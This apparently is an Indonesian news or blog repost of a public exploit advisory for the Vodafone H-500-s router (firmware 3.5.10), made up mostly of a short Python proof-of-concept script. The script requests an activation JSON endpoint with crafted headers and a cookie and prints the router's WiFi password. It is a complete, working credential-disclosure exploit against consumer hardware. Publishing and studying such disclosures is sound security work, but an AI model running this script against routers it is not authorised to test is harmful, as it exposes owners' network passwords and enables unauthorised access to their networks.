Vodafone H-500-s 3.5.10 Pengungkapan Kata Sandi WiFi

  • Whatsapp
Cibele Thinfinity VirtualUI 2.5.41.0 Enumerasi Pengguna
Cibele Thinfinity VirtualUI Enumerasi Pengguna

News.nextcloud.asia

Vodafone H-500-s versi 3.5.10 menderita kerentanan pengungkapan kata sandi wifi.

MD5 | d4a56e2d1badafc971ff7d04eaf5a5f5

# Exploit Title: Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
# Date: 01/01/2022
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.vodafone.es/
# Software Link: N/A
# Version: Firmware version Vodafone-H-500-s-v3.5.10
# Hardware model: Sercomm VFH500

# The WiFi access point password gets disclosed just by performing a GET request with certain headers

import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101

Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}

req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *